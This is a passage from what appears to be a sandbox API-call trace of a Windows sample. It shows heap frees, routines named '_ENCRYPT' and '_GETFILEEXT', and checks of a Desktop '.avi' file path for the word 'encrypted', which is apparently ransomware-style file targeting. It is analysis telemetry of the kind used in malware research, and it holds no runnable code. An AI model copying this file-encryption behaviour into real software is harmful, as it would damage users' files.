(HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0030.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0030.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0030.888] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0030.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0030.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0030.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0030.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0030.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0030.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0030.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0030.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0030.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0030.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0030.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0030.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0030.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0030.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0030.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0030.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0030.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0030.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0030.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0030.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0030.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0030.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0030.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0030.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0030.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0030.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0030.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0030.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0030.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0030.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0030.889] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.889] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.889] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0030.889] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.889] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0030.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0030.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0030.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0030.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0030.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0030.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0030.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0030.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0030.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0030.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0030.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0030.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0030.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0030.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0030.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.890] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0030.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0030.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0030.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0030.890] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.890] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0030.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0030.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0030.890] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.890] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0030.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.890] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0030.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0030.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0030.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0030.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0030.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0030.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0030.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.891] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.891] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.891] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.891] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca047e90, ftCreationTime.dwHighDateTime=0x1d5bec3, ftLastAccessTime.dwLowDateTime=0xa4c0b630, ftLastAccessTime.dwHighDateTime=0x1d5b838, ftLastWriteTime.dwLowDateTime=0xa4c0b630, ftLastWriteTime.dwHighDateTime=0x1d5b838, nFileSizeHigh=0x0, nFileSizeLow=0x15b28, dwReserved0=0x0, dwReserved1=0x777648, cFileName="seoYHLX7CEV1iLpfdx.avi", cAlternateFileName="SEOYHL~1.AVI")) returned 0x7c20c0 [0030.891] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0030.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0030.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0030.891] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.891] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca047e90, ftCreationTime.dwHighDateTime=0x1d5bec3, ftLastAccessTime.dwLowDateTime=0xa4c0b630, ftLastAccessTime.dwHighDateTime=0x1d5b838, ftLastWriteTime.dwLowDateTime=0xa4c0b630, ftLastWriteTime.dwHighDateTime=0x1d5b838, nFileSizeHigh=0x0, nFileSizeLow=0x15b28, dwReserved0=0x0, dwReserved1=0x777648, cFileName="seoYHLX7CEV1iLpfdx.avi", cAlternateFileName="SEOYHL~1.AVI")) returned 0x7c20c0 [0030.891] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0030.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0030.891] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="33uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hl8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vtf\\seoYHLX7CEV1iLpfdx.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.893] CompareStringW 